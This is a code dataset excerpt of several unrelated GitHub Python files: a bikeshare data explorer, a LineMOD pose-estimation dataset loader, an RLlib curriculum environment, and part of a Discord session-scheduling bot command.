print('-'*40)\n\n #define main function\ndef main():\n while True:\n city, month, day = get_filters()\n df = load_data(city, month, day)\n time_stats(df)\n station_stats(df)\n trip_duration_stats(df)\n user_stats(df)\n\n print('Hello! Let\\'s explore some US bikeshare raw data!')\n #To get inputs (yes/no) from the user to view 5 lines of raw data per every confirmation.\n #Initial value of 0 for printing raw data - per requirement\n\n a = 0;\n #User to enter a number for viewing raw data\n try:\n b = int(input('if you are given an option, how many lines of raw data do you prefer to view per request? Enter a number\\n'))\n except ValueError:\n b=5\n #to improve speed of the process - defaulting value to 5 per requirement\n print(\"Invalid input. Default value set to 5\")\n\n while True:\n sample_data = input(\"Do you want to view sample raw data for analysis? Enter yes or no.\\n\")\n if sample_data.lower() =='yes':\n print(df.iloc[a:b])\n a+=5\n b+=5\n else:\n break\n\n #Option to restart the program\n restart = input('\\nWould you like to restart? Enter yes or no.\\n')\n if restart.lower() != 'yes':\n break\n\n\nif __name__ == \"__main__\":\n\tmain()\n","repo_name":"abhivasanth/bikeshare","sub_path":"bikeshare.py","file_name":"bikeshare.py","file_ext":"py","file_size_in_byte":8356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"9891790800","text":"#!/usr/bin/env python3\nimport os\nimport pickle\nimport json\n\nimport cv2\nimport torch\nimport os.path\nimport numpy as np\nimport torchvision.transforms as transforms\nfrom PIL import Image\nfrom common import Config\nimport pickle as pkl\nfrom utils.basic_utils import Basic_Utils\nimport scipy.io as scio\nimport scipy.misc\ntry:\n from neupeak.utils.webcv2 import imshow, waitKey\nexcept:\n from cv2 import imshow, waitKey\nimport normalSpeed\nfrom models.RandLA.helper_tool import DataProcessing as DP\n\n\nconfig = Config(ds_name='boplm')\nbs_utils = Basic_Utils(config)\n\n\nclass Dataset():\n\n def __init__(self, dataset_name, DEBUG=False):\n self.dataset_name = dataset_name\n self.root = config.boplm_root\n self.debug = DEBUG\n self.xmap = np.array([[j for i in range(640)] for j in range(480)])\n self.ymap = np.array([[i for i in range(640)] for j in range(480)])\n self.diameters = {}\n self.trancolor = transforms.ColorJitter(0.2, 0.2, 0.2, 0.05)\n self.norm = transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.224])\n self.cls_lst = bs_utils.read_lines(config.boplm_cls_lst_p)\n self.obj_dict = {}\n self.normals = []\n\n for cls_id, cls in enumerate(self.cls_lst, start=1):\n self.obj_dict[cls] = cls_id\n cls_normal_p = os.path.join(self.root, 'symmetries/{}/symmetries.txt'.format(cls_id))\n normal = self.read_normal(cls_normal_p)\n self.normals.append(normal)\n self.rng = np.random\n\n cache_dir = os.path.join(config.boplm_root, 'cache')\n if not os.path.exists(cache_dir):\n os.makedirs(cache_dir)\n self.cache_dir = cache_dir\n\n if dataset_name == 'train':\n self.add_noise = True\n self.all_lst = self.load_train_image_set()\n self.minibatch_per_epoch = len(self.all_lst) // config.mini_batch_size\n elif dataset_name == 'test' or dataset_name == 'trainval':\n self.add_noise = False\n self.all_lst = self.load_test_image_set()\n else:\n raise NotImplementedError\n print(\"{}_dataset_size: \".format(dataset_name), len(self.all_lst))\n self.sym_cls_ids = [3, 10, 11]\n\n def load_train_image_set(self):\n cache_file = os.path.join(self.cache_dir, 'train_data_collection.pkl')\n if os.path.exists(cache_file):\n with open(cache_file, 'rb') as fid:\n image_index = pickle.load(fid)\n print('train_pbr image index loaded from {}'.format(cache_file))\n print('{} training images'.format(len(image_index)))\n return image_index\n\n annot = []\n for seq_id in range(50):\n tr_obj_dir = os.path.join(self.root, 'train_pbr/{:06d}'.format(seq_id))\n f_pose = os.path.join(tr_obj_dir, 'scene_gt.json')\n f_det = os.path.join(tr_obj_dir, 'scene_gt_info.json')\n f_cam = os.path.join(tr_obj_dir, 'scene_camera.json')\n with open(f_pose, 'r') as f:\n annot_pose = json.load(f)\n with open(f_det, 'r') as f:\n annot_det = json.load(f)\n with open(f_cam, 'r') as f:\n annot_cam = json.load(f)\n for k in annot_pose.keys():\n annot_temp = {}\n annot_temp['rgb_pth'] = os.path.join('train_pbr/{:06d}'.format(seq_id), 'rgb/{:06d}.jpg'.format(int(k)))\n annot_temp['dpt_pth'] = os.path.join('train_pbr/{:06d}'.format(seq_id), 'depth/{:06d}.png'.format(int(k)))\n annot_temp['factor_depth'] = np.array(annot_cam[k]['depth_scale'], dtype=np.float32)\n annot_temp['intrinsic_matrix'] = np.array(annot_cam[k]['cam_K'], dtype=np.float32).reshape(3, 3)\n\n cls_indexes = []\n poses = []\n msk_orders = []\n for j in range(len(annot_pose[k])):\n obj_id = annot_pose[k][j]['obj_id']\n visib_fract = annot_det[k][j]['visib_fract']\n if (obj_id not in self.obj_dict.values()) or (visib_fract < 0.1):\n continue\n R = np.array(annot_pose[k][j]['cam_R_m2c'], dtype=np.float32).reshape(3, 3)\n T = np.array(annot_pose[k][j]['cam_t_m2c'], dtype=np.float32) / 1000.\n RT = np.concatenate([R, T[:, None]], axis=1)\n poses.append(RT)\n\n cls_indexes.append(obj_id)\n msk_orders.append(j)\n\n annot_temp['msk_orders'] = msk_orders\n annot_temp['cls_indexes'] = cls_indexes\n annot_temp['poses'] = np.array(poses)\n annot_temp['seq_id'] = int(seq_id)\n annot_temp['img_id'] = int(k)\n annot.append(annot_temp)\n\n with open(cache_file, 'wb') as fid:\n pickle.dump(annot, fid, pickle.HIGHEST_PROTOCOL)\n print('wrote train_pbr image index to {}'.format(cache_file))\n return annot\n\n def load_test_image_set(self):\n cache_file = os.path.join(self.cache_dir, 'test_data_collection.pkl')\n if os.path.exists(cache_file):\n with open(cache_file, 'rb') as fid:\n image_index = pickle.load(fid)\n print('testocc image index loaded from {}'.format(cache_file))\n print('{} test images'.format(len(image_index)))\n return image_index\n\n annot = []\n for seq_id in [2]:\n tr_obj_dir = os.path.join(self.root, 'test/{:06d}'.format(seq_id))\n f_pose = os.path.join(tr_obj_dir, 'scene_gt.json')\n f_det = os.path.join(tr_obj_dir, 'scene_gt_info.json')\n f_cam = os.path.join(tr_obj_dir, 'scene_camera.json')\n with open(f_pose, 'r') as f:\n annot_pose = json.load(f)\n with open(f_det, 'r') as f:\n annot_det = json.load(f)\n with open(f_cam, 'r') as f:\n annot_cam = json.load(f)\n for k in annot_pose.keys():\n annot_temp = {}\n annot_temp['rgb_pth'] = os.path.join('test/{:06d}'.format(seq_id), 'rgb/{:06d}.png'.format(int(k)))\n annot_temp['dpt_pth'] = os.path.join('test/{:06d}'.format(seq_id), 'depth/{:06d}.png'.format(int(k)))\n annot_temp['factor_depth'] = np.array(annot_cam[k]['depth_scale'], dtype=np.float32)\n annot_temp['intrinsic_matrix'] = np.array(annot_cam[k]['cam_K'], dtype=np.float32).reshape(3, 3)\n\n cls_indexes = []\n poses = []\n msk_orders = []\n for j in range(len(annot_pose[k])):\n R = np.array(annot_pose[k][j]['cam_R_m2c'], dtype=np.float32).reshape(3, 3)\n T = np.array(annot_pose[k][j]['cam_t_m2c'], dtype=np.float32) / 1000.\n RT = np.concatenate([R, T[:, None]], axis=1)\n poses.append(RT)\n\n obj_id = annot_pose[k][j]['obj_id']\n cls_indexes.append(obj_id)\n msk_orders.append(j)\n\n annot_temp['msk_orders'] = msk_orders\n annot_temp['cls_indexes'] = cls_indexes\n annot_temp['poses'] = np.array(poses)\n annot_temp['seq_id'] = int(seq_id)\n annot_temp['img_id'] = int(k)\n\n annot.append(annot_temp)\n\n with open(cache_file, 'wb') as fid:\n pickle.dump(annot, fid, pickle.HIGHEST_PROTOCOL)\n print('wrote test image index to {}'.format(cache_file))\n return annot\n\n def read_normal(self, filename):\n with open(filename) as f:\n lines = f.readlines()\n normal = np.array(lines[3].strip().split(), dtype=np.float32)\n return normal\n\n def syn_gen(self):\n n = len(self.all_lst)\n idx = self.rng.randint(0, n)\n item = self.all_lst[idx]\n return item\n\n def real_gen(self):\n n = len(self.real_lst)\n idx = self.rng.randint(0, n)\n item = self.real_lst[idx]\n return item\n\n def rand_range(self, rng, lo, hi):\n return rng.rand()*(hi-lo)+lo\n\n def gaussian_noise(self, rng, img, sigma):\n \"\"\"add gaussian noise of given sigma to image\"\"\"\n img = img + rng.randn(*img.shape) * sigma\n img = np.clip(img, 0, 255).astype('uint8')\n return img\n\n def linear_motion_blur(self, img, angle, length):\n \"\"\":param angle: in degree\"\"\"\n rad = np.deg2rad(angle)\n dx = np.cos(rad)\n dy = np.sin(rad)\n a = int(max(list(map(abs, (dx, dy)))) * length * 2)\n if a <= 0:\n return img\n kern = np.zeros((a, a))\n cx, cy = a // 2, a // 2\n dx, dy = list(map(int, (dx * length + cx, dy * length + cy)))\n cv2.line(kern, (cx, cy), (dx, dy), 1.0)\n s = kern.sum()\n if s == 0:\n kern[cx, cy] = 1.0\n else:\n kern /= s\n return cv2.filter2D(img, -1, kern)\n\n def rgb_add_noise(self, img):\n rng = self.rng\n # apply HSV augmentor\n if rng.rand() > 0:\n hsv_img = cv2.cvtColor(img, cv2.COLOR_BGR2HSV).astype(np.uint16)\n hsv_img[:, :, 1] = hsv_img[:, :, 1] * self.rand_range(rng, 1.25, 1.45)\n hsv_img[:, :, 2] = hsv_img[:, :, 2] * self.rand_range(rng, 1.15, 1.35)\n hsv_img[:, :, 1] = np.clip(hsv_img[:, :, 1], 0, 255)\n hsv_img[:, :, 2] = np.clip(hsv_img[:, :, 2], 0, 255)\n img = cv2.cvtColor(hsv_img.astype(np.uint8), cv2.COLOR_HSV2BGR)\n\n if rng.rand() > .8: # sharpen\n kernel = -np.ones((3, 3))\n kernel[1, 1] = rng.rand() * 3 + 9\n kernel /= kernel.sum()\n img = cv2.filter2D(img, -1, kernel)\n\n if rng.rand() > 0.8: # motion blur\n r_angle = int(rng.rand() * 360)\n r_len = int(rng.rand() * 15) + 1\n img = self.linear_motion_blur(img, r_angle, r_len)\n\n if rng.rand() > 0.8:\n if rng.rand() > 0.2:\n img = cv2.GaussianBlur(img, (3, 3), rng.rand())\n else:\n img = cv2.GaussianBlur(img, (5, 5), rng.rand())\n\n if rng.rand() > 0.2:\n img = self.gaussian_noise(rng, img, rng.randint(15))\n else:\n img = self.gaussian_noise(rng, img, rng.randint(25))\n\n if rng.rand() > 0.8:\n img = img + np.random.normal(loc=0.0, scale=7.0, size=img.shape)\n\n return np.clip(img, 0, 255).astype(np.uint8)\n\n def dpt_2_pcld(self, dpt, cam_scale, K):\n if len(dpt.shape) > 2:\n dpt = dpt[:, :, 0]\n dpt = dpt.astype(np.float32) / cam_scale\n msk = (dpt > 1e-8).astype(np.float32)\n row = (self.ymap - K[0][2]) * dpt / K[0][0]\n col = (self.xmap - K[1][2]) * dpt / K[1][1]\n dpt_3d = np.concatenate(\n (row[..., None], col[..., None], dpt[..., None]), axis=2\n )\n dpt_3d = dpt_3d * msk[:, :, None]\n return dpt_3d\n\n def generate_labels(self, item):\n mask = np.zeros((480, 640), dtype=np.uint8)\n cls_indexes = item['cls_indexes']\n msk_orders = item['msk_orders']\n for i in range(len(cls_indexes)):\n obj_id = cls_indexes[i]\n if self.dataset_name == 'train':\n msk_vis_pth = os.path.join(\n self.root, 'train_pbr/{:06d}/mask_visib/{:06d}_{:06d}.png'.format(item['seq_id'], item['img_id'], msk_orders[i]))\n else:\n msk_vis_pth = os.path.join(\n self.root, 'test/{:06d}/mask_visib/{:06d}_{:06d}.png'.format(item['seq_id'], item['img_id'], msk_orders[i]))\n with Image.open(msk_vis_pth) as li:\n labels = np.array(li)\n mask[labels!=0] = obj_id\n\n return mask\n\n def generate_sym_cor(self, item):\n if self.dataset_name == 'train':\n sym_cor = np.load(\n os.path.join(self.root, 'train_pbr/{:06d}/sym_cor/{:06d}.npz'.format(item['seq_id'], item['img_id']))\n )['cor']\n else:\n sym_cor = np.load(\n os.path.join(self.root, 'test/{:06d}/sym_cor/{:06d}.npz'.format(item['seq_id'], item['img_id']))\n )['cor']\n return sym_cor\n\n def get_item(self, item):\n with Image.open(os.path.join(self.root, item['rgb_pth'])) as ri:\n if self.add_noise:\n ri = self.trancolor(ri)\n rgb = np.array(ri)[:, :, :3]\n with Image.open(os.path.join(self.root, item['dpt_pth'])) as di:\n dpt_um = np.array(di)\n\n labels = self.generate_labels(item)\n rgb_labels = labels.copy()\n\n K = item['intrinsic_matrix']\n sym_cor = self.generate_sym_cor(item)\n cam_scale = item['factor_depth']\n\n if self.add_noise:\n rgb = self.rgb_add_noise(rgb)\n\n msk_dp = dpt_um > 1e-6\n dpt_mm = (dpt_um.copy() * cam_scale).astype(np.uint16)\n nrm_map = normalSpeed.depth_normal(\n dpt_mm, K[0][0], K[1][1], 5, 2000, 20, False\n )\n if self.debug:\n show_nrm_map = ((nrm_map + 1.0) * 127).astype(np.uint8)\n imshow(\"nrm_map\", show_nrm_map)\n imshow('mask', rgb_labels)\n print('sym_cor:', sym_cor.shape)\n\n dpt_m = dpt_mm.astype(np.float32) / 1000\n dpt_xyz = self.dpt_2_pcld(dpt_m, 1, K)\n\n choose = msk_dp.flatten().nonzero()[0].astype(np.uint32)\n if len(choose) < 400:\n return None\n choose_2 = np.array([i for i in range(len(choose))])\n if len(choose_2) < 400:\n return None\n if len(choose_2) > config.n_sample_points:\n c_mask = np.zeros(len(choose_2), dtype=int)\n c_mask[:config.n_sample_points] = 1\n np.random.shuffle(c_mask)\n choose_2 = choose_2[c_mask.nonzero()]\n else:\n choose_2 = np.pad(choose_2, (0, config.n_sample_points-len(choose_2)), 'wrap')\n choose = np.array(choose)[choose_2]\n\n sf_idx = np.arange(choose.shape[0])\n np.random.shuffle(sf_idx)\n choose = choose[sf_idx]\n\n cld = dpt_xyz.reshape(-1, 3)[choose, :]\n rgb_pt = rgb.reshape(-1, 3)[choose, :].astype(np.float32)\n nrm_pt = nrm_map[:, :, :3].reshape(-1, 3)[choose, :]\n labels_pt = labels.flatten()[choose]\n choose = np.array([choose])\n cld_rgb_nrm = np.concatenate((cld, rgb_pt, nrm_pt), axis=1).transpose(1, 0)\n sym_cor_targ = sym_cor.reshape(-1, 3)[choose, :].astype(np.float32)\n\n cls_id_lst = np.array(item['cls_indexes']).astype(np.uint32)\n RTs, kp3ds, ctr3ds, cls_ids, kp_targ_ofst, ctr_targ_ofst, graph_targ = self.get_pose_gt_info(\n cld, labels_pt, cls_id_lst, item\n )\n\n h, w = rgb_labels.shape\n dpt_6c = np.concatenate((dpt_xyz, nrm_map[:, :, :3]), axis=2).transpose(2, 0, 1)\n rgb = np.transpose(rgb, (2, 0, 1)) # hwc2chw\n\n xyz_lst = [dpt_xyz.transpose(2, 0, 1)] # c, h, w\n msk_lst = [dpt_xyz[2, :, :] > 1e-8]\n\n for i in range(3):\n scale = pow(2, i+1)\n nh, nw = h // pow(2, i+1), w // pow(2, i+1)\n ys, xs = np.mgrid[:nh, :nw]\n xyz_lst.append(xyz_lst[0][:, ys*scale, xs*scale])\n msk_lst.append(xyz_lst[-1][2, :, :] > 1e-8)\n sr2dptxyz = {\n pow(2, ii): item.reshape(3, -1).transpose(1, 0) for ii, item in enumerate(xyz_lst)\n }\n sr2msk = {\n pow(2, ii): item.reshape(-1) for ii, item in enumerate(msk_lst)\n }\n\n rgb_ds_sr = [4, 8, 8, 8]\n n_ds_layers = 4\n pcld_sub_s_r = [4, 4, 4, 4]\n inputs = {}\n # DownSample stage\n for i in range(n_ds_layers):\n nei_idx = DP.knn_search(\n cld[None, ...], cld[None, ...], 16\n ).astype(np.int32).squeeze(0)\n sub_pts = cld[:cld.shape[0] // pcld_sub_s_r[i], :]\n pool_i = nei_idx[:cld.shape[0] // pcld_sub_s_r[i], :]\n up_i = DP.knn_search(\n sub_pts[None, ...], cld[None, ...], 1\n ).astype(np.int32).squeeze(0)\n inputs['cld_xyz%d'%i] = cld.astype(np.float32).copy()\n inputs['cld_nei_idx%d'%i] = nei_idx.astype(np.int32).copy()\n inputs['cld_sub_idx%d'%i] = pool_i.astype(np.int32).copy()\n inputs['cld_interp_idx%d'%i] = up_i.astype(np.int32).copy()\n nei_r2p = DP.knn_search(\n sr2dptxyz[rgb_ds_sr[i]][None, ...], sub_pts[None, ...], 16\n ).astype(np.int32).squeeze(0)\n inputs['r2p_ds_nei_idx%d'%i] = nei_r2p.copy()\n nei_p2r = DP.knn_search(\n sub_pts[None, ...], sr2dptxyz[rgb_ds_sr[i]][None, ...], 1\n ).astype(np.int32).squeeze(0)\n inputs['p2r_ds_nei_idx%d'%i] = nei_p2r.copy()\n cld = sub_pts\n\n n_up_layers = 3\n rgb_up_sr = [4, 2, 2]\n for i in range(n_up_layers):\n r2p_nei = DP.knn_search(\n sr2dptxyz[rgb_up_sr[i]][None, ...],\n inputs['cld_xyz%d'%(n_ds_layers-i-1)][None, ...], 16\n ).astype(np.int32).squeeze(0)\n inputs['r2p_up_nei_idx%d'%i] = r2p_nei.copy()\n p2r_nei = DP.knn_search(\n inputs['cld_xyz%d'%(n_ds_layers-i-1)][None, ...],\n sr2dptxyz[rgb_up_sr[i]][None, ...], 1\n ).astype(np.int32).squeeze(0)\n inputs['p2r_up_nei_idx%d'%i] = p2r_nei.copy()\n\n show_rgb = rgb.transpose(1, 2, 0).copy()[:, :, ::-1]\n if self.debug:\n for ip, xyz in enumerate(xyz_lst):\n pcld = xyz.reshape(3, -1).transpose(1, 0)\n p2ds = bs_utils.project_p3d(pcld, cam_scale, K)\n print(show_rgb.shape, pcld.shape)\n srgb = bs_utils.paste_p2ds(show_rgb.copy(), p2ds, (0, 0, 255))\n imshow(\"rz_pcld_%d\" % ip, srgb)\n p2ds = bs_utils.project_p3d(inputs['cld_xyz%d'%ip], cam_scale, K)\n srgb1 = bs_utils.paste_p2ds(show_rgb.copy(), p2ds, (0, 0, 255))\n imshow(\"rz_pcld_%d_rnd\" % ip, srgb1)\n\n item_dict = dict(\n rgb=rgb.astype(np.uint8), # [c, h, w]\n cld_rgb_nrm=cld_rgb_nrm.astype(np.float32), # [9, npts]\n choose=choose.astype(np.int32), # [1, npts]\n labels=labels_pt.astype(np.int32), # [npts]\n rgb_labels=rgb_labels.astype(np.int32), # [h, w]\n dpt_map_m=dpt_m.astype(np.float32), # [h, w]\n RTs=RTs.astype(np.float32),\n kp_targ_ofst=kp_targ_ofst.astype(np.float32),\n graph_targ=graph_targ.astype(np.float32),\n sym_cor_targ=sym_cor_targ.astype(np.float32),\n ctr_targ_ofst=ctr_targ_ofst.astype(np.float32),\n cls_ids=cls_ids.astype(np.int32),\n ctr_3ds=ctr3ds.astype(np.float32),\n kp_3ds=kp3ds.astype(np.float32),\n seq_id=np.array(item['seq_id']).astype(np.int32),\n img_id=np.array(item['img_id']).astype(np.int32)\n )\n item_dict.update(inputs)\n if self.debug:\n extra_d = dict(\n dpt_xyz_nrm=dpt_6c.astype(np.float32), # [6, h, w]\n cam_scale=np.array([cam_scale]).astype(np.float32),\n K=K.astype(np.float32),\n )\n item_dict.update(extra_d)\n item_dict['normal_map'] = nrm_map[:, :, :3].astype(np.float32)\n return item_dict\n\n def get_pose_gt_info(self, cld, labels, cls_id_lst, meta):\n RTs = np.zeros((config.n_objects, 3, 4))\n kp3ds = np.zeros((config.n_objects, config.n_keypoints, 3))\n ctr3ds = np.zeros((config.n_objects, 3))\n cls_ids = np.zeros((config.n_objects, 1))\n kp_targ_ofst = np.zeros((config.n_sample_points, config.n_keypoints, 3))\n ctr_targ_ofst = np.zeros((config.n_sample_points, 3))\n edg_targ_ofst = np.zeros((config.n_sample_points, config.n_edges, 3))\n for i, cls_id in enumerate(cls_id_lst):\n r = meta['poses'][i, :, :][:, 0:3]\n t = np.array(meta['poses'][i, :, :][:, 3:4].flatten()[:, None])\n RT = np.concatenate((r, t), axis=1)\n RTs[i] = RT\n\n ctr = bs_utils.get_ctr(self.cls_lst[cls_id-1], ds_type='boplm').copy()[:, None]\n ctr = np.dot(ctr.T, r.T) + t[:, 0]\n ctr3ds[i, :] = ctr[0]\n msk_idx = np.where(labels == cls_id)[0]\n\n target_offset = np.array(np.add(cld, -1.0*ctr3ds[i, :]))\n ctr_targ_ofst[msk_idx,:] = target_offset[msk_idx, :]\n cls_ids[i, :] = np.array([cls_id])\n\n key_kpts = ''\n if config.n_keypoints == 8:\n kp_type = 'farthest'\n else:\n kp_type = 'farthest{}'.format(config.n_keypoints)\n kps = bs_utils.get_kps(\n self.cls_lst[cls_id-1], kp_type=kp_type, ds_type='boplm'\n ).copy()\n kps = np.dot(kps, r.T) + t[:, 0]\n kp3ds[i] = kps\n\n target = []\n for kp in kps:\n target.append(np.add(cld, -1.0*kp))\n target_offset = np.array(target).transpose(1, 0, 2) # [npts, nkps, c]\n kp_targ_ofst[msk_idx, :, :] = target_offset[msk_idx, :, :]\n\n edge_idx = 0\n for start_idx in range(0, config.n_keypoints - 1):\n start = kps[start_idx]\n for end_idx in range(start_idx + 1, config.n_keypoints):\n end = kps[end_idx]\n edge = end - start\n edg_targ_ofst[msk_idx, edge_idx, :] = edge\n edge_idx += 1\n return RTs, kp3ds, ctr3ds, cls_ids, kp_targ_ofst, ctr_targ_ofst, edg_targ_ofst\n\n def __len__(self):\n return len(self.all_lst)\n\n def __getitem__(self, idx):\n if self.dataset_name == 'train':\n item_name = self.syn_gen()\n data = self.get_item(item_name)\n while data is None:\n item_name = self.syn_gen()\n data = self.get_item(item_name)\n return data\n else:\n item_name = self.all_lst[idx]\n return self.get_item(item_name)\n\n\ndef main():\n # config.mini_batch_size = 1\n global DEBUG\n DEBUG = True\n ds = {}\n ds['train'] = Dataset('train', DEBUG=True)\n # ds['val'] = Dataset('validation')\n ds['test'] = Dataset('test', DEBUG=True)\n idx = dict(\n train=0,\n val=0,\n test=0\n )\n while True:\n # for cat in ['val', 'test']:\n for cat in ['train']:\n # for cat in ['test']:\n datum = ds[cat].__getitem__(idx[cat])\n idx[cat] += 1\n K = datum['K']\n cam_scale = datum['cam_scale']\n rgb = datum['rgb'].transpose(1, 2, 0)[...,::-1].copy()# [...,::-1].copy()\n for i in range(9):\n pcld = datum['cld_rgb_nrm'][:3, :].transpose(1, 0).copy()\n p2ds = bs_utils.project_p3d(pcld, 1.0, K)\n # rgb = bs_utils.draw_p2ds(rgb, p2ds)\n kp3d = datum['kp_3ds'][i]\n if kp3d.sum() < 1e-6:\n break\n kp_2ds = bs_utils.project_p3d(kp3d, 1.0, K)\n rgb = bs_utils.draw_p2ds(\n rgb, kp_2ds, 3, bs_utils.get_label_color(datum['cls_ids'][i][0], mode=1)\n )\n ctr3d = datum['ctr_3ds'][i]\n ctr_2ds = bs_utils.project_p3d(ctr3d[None, :], 1.0, K)\n rgb = bs_utils.draw_p2ds(\n rgb, ctr_2ds, 4, (0, 0, 255)\n )\n imshow('{}_rgb'.format(cat), rgb)\n cmd = waitKey(0)\n if cmd == ord('q'):\n exit()\n else:\n continue\n\n\nif __name__ == \"__main__\":\n main()\n# vim: ts=4 sw=4 sts=4 expandtab\n","repo_name":"JiChun-Wang/MGRNet","sub_path":"datasets/lmo/boplm_dataset.py","file_name":"boplm_dataset.py","file_ext":"py","file_size_in_byte":23825,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"36820614086","text":"\"\"\"Implementation of a simple simulation/environment in AML.\"\"\"\nimport numpy as np\n\n# from gymnasium import Env\nfrom gymnasium.spaces import Box, Dict\n\n# Import TaskSettableEnv from RLlib\nfrom ray.rllib.env.apis.task_settable_env import TaskSettableEnv\nfrom ray.rllib.utils.annotations import override\n\n\nclass SimpleAdder(TaskSettableEnv):\n \"\"\"\n Implement a SimpleAdder as a custom Gymnasium environment.\n\n Details on which attributes and methods are required for the integration\n can be found in the docs.\n\n The environment has a pretty simple state and action space. The state is\n composed of an integer numbers. The action is composed of an integer number\n between -10 and 10. At each episode, the state number is initialized between\n 0 and 100, and at each iteration the agent chooses a number between -10 and 10.\n The chosen number is added to the state. The purpose of the simulation is to\n get the state equal to 50, at which point the episode terminates. The episode\n duration is limited to 10 iterations.\n \"\"\"\n\n def __init__(self, env_config):\n self.observation_space = Dict(\n {\"value\": Box(low=-float(\"inf\"), high=float(\"inf\"))}\n )\n self.action_space = Dict({\"addend\": Box(low=-10, high=10, dtype=np.int32)})\n\n # Initialize the task exponent attribute to 1\n self.exponent = 1\n\n def _get_obs(self):\n \"\"\"Get the observable state.\"\"\"\n return {\"value\": np.array([self.state[\"value\"]])}\n\n def _get_info(self):\n \"\"\"Get additional info not needed by the agent's decision.\"\"\"\n return {}\n\n def reward(self, state):\n \"\"\"\n Return the reward value.\n\n For this simple example this is just the distance to the number 50.\n We add 10 (maximum steps per episode) to the reward and subtract the\n current step to encourage to finish the episode as fast as possible.\n \"\"\"\n return -abs(state[\"value\"] - 50) + 10 - self.iter\n\n def reset(self, *, seed=None, options=None):\n \"\"\"Start a new episode.\"\"\"\n self.iter = 0\n # Get the current task (curriculum level)\n task = self.get_task()\n # Get the exponent of 2 for the task\n exponent = task[\"exponent\"]\n # Initialize the state value randomly between +/- 2**exponent from target of 50\n self.state = {\"value\": 50 + np.random.randint(-(2**exponent), 2**exponent)}\n return self._get_obs(), self._get_info()\n\n def step(self, action):\n \"\"\"Advance one iteration by applying the given ``action``.\"\"\"\n self.state[\"value\"] += action[\"addend\"].item()\n self.iter += 1\n reward = self.reward(self.state)\n terminated = self.state[\"value\"] == 50\n truncated = self.iter >= 10\n return (\n self._get_obs(),\n reward,\n terminated,\n truncated,\n self._get_info(),\n )\n\n @override(TaskSettableEnv)\n def get_task(self):\n \"\"\"Implement this to get the current task (curriculum level).\"\"\"\n # Return the current exponent value as the task\n return {\"exponent\": self.exponent}\n\n @override(TaskSettableEnv)\n def set_task(self, task):\n \"\"\"Set a new task for this sim env.\"\"\"\n # Set the exponent value based on the task\n self.exponent = task[\"exponent\"]\n","repo_name":"Azure/plato","sub_path":"examples/curriculum-learning/src/sim_curriculum_capable.py","file_name":"sim_curriculum_capable.py","file_ext":"py","file_size_in_byte":3357,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"66"} +{"seq_id":"36217865712","text":"import re\nimport datetime\nimport discord\nimport asyncio\nimport contextlib\nfrom cmdClient.checks import in_guild\n\nfrom meta import client\nfrom utils.lib import multiselect_regex, parse_ranges, prop_tabulate\nfrom data import NOTNULL\nfrom data.conditions import GEQ, LEQ\n\nfrom .module import module\nfrom .lib import utc_now\nfrom .tracker import AccountabilityGuild as AGuild\nfrom .tracker import room_lock\nfrom .TimeSlot import SlotMember\nfrom .data import accountability_members, accountability_member_info, accountability_rooms\n\n\nhint_icon = \"https://projects.iamcal.com/emoji-data/img-apple-64/1f4a1.png\"\n\n\ndef time_format(time):\n diff = (time - utc_now()).total_seconds()\n if diff < 0:\n diffstr = \"`Right Now!!`\"\n elif diff < 600:\n diffstr = \"`Very soon!!`\"\n elif diff < 3600:\n diffstr = \"`In <1 hour `\"\n else:\n hours = round(diff / 3600)\n diffstr = \"`In {:>2} hour{}`\".format(hours, 's' if hours > 1 else ' ')\n\n return \"{} | - \".format(\n diffstr,\n time.timestamp(),\n time.timestamp() + 3600,\n )\n\n\nuser_locks = {} # Map userid -> ctx\n\n\n@contextlib.contextmanager\ndef ensure_exclusive(ctx):\n \"\"\"\n Cancel any existing exclusive contexts for the author.\n \"\"\"\n old_ctx = user_locks.pop(ctx.author.id, None)\n if old_ctx:\n [task.cancel() for task in old_ctx.tasks]\n\n user_locks[ctx.author.id] = ctx\n try:\n yield\n finally:\n new_ctx = user_locks.get(ctx.author.id, None)\n if new_ctx and new_ctx.msg.id == ctx.msg.id:\n user_locks.pop(ctx.author.id)\n\n\n@module.cmd(\n name=\"schedule\",\n desc=\"View your schedule, and get rewarded for attending scheduled sessions!\",\n group=\"Productivity\",\n aliases=('rooms', 'sessions')\n)\n@in_guild()\nasync def cmd_rooms(ctx):\n \"\"\"\n Usage``:\n {prefix}schedule\n {prefix}schedule book\n {prefix}schedule cancel\n Description:\n View your schedule with `{prefix}schedule`.\n Use `{prefix}schedule book` to schedule a session at a selected time..\n Use `{prefix}schedule cancel` to cancel a scheduled session.\n \"\"\"\n lower = ctx.args.lower()\n splits = lower.split()\n command = splits[0] if splits else None\n\n if not ctx.guild_settings.accountability_category.value:\n return await ctx.error_reply(\"The scheduled session system isn't set up!\")\n\n # First grab the sessions the member is booked in\n joined_rows = accountability_member_info.select_where(\n userid=ctx.author.id,\n start_at=GEQ(utc_now()),\n _extra=\"ORDER BY start_at ASC\"\n )\n\n if command == 'cancel':\n if not joined_rows:\n return await ctx.error_reply(\"You have no scheduled sessions to cancel!\")\n\n # Show unbooking menu\n lines = [\n \"`[{:>2}]` | {}\".format(i, time_format(row['start_at']))\n for i, row in enumerate(joined_rows)\n ]\n out_msg = await ctx.reply(\n content=\"Please reply with the number(s) of the sessions you want to cancel. E.g. `1, 3, 5` or `1-3, 7-8`.\",\n embed=discord.Embed(\n title=\"Please choose the sessions you want to cancel.\",\n description='\\n'.join(lines),\n colour=discord.Colour.orange()\n ).set_footer(\n text=(\n \"All times are in your own timezone! Hover over a time to see the date.\"\n )\n )\n )\n\n await ctx.cancellable(\n out_msg,\n cancel_message=\"Cancel menu closed, no scheduled sessions were cancelled.\",\n timeout=70\n )\n\n def check(msg):\n valid = msg.channel == ctx.ch and msg.author == ctx.author\n valid = valid and (re.search(multiselect_regex, msg.content) or msg.content.lower() == 'c')\n return valid\n\n with ensure_exclusive(ctx):\n try:\n message = await ctx.client.wait_for('message', check=check, timeout=60)\n except asyncio.TimeoutError:\n try:\n await out_msg.edit(\n content=None,\n embed=discord.Embed(\n description=\"Cancel menu timed out, no scheduled sessions were cancelled.\",\n colour=discord.Colour.red()\n )\n )\n await out_msg.clear_reactions()\n except discord.HTTPException:\n pass\n return\n\n try:\n await 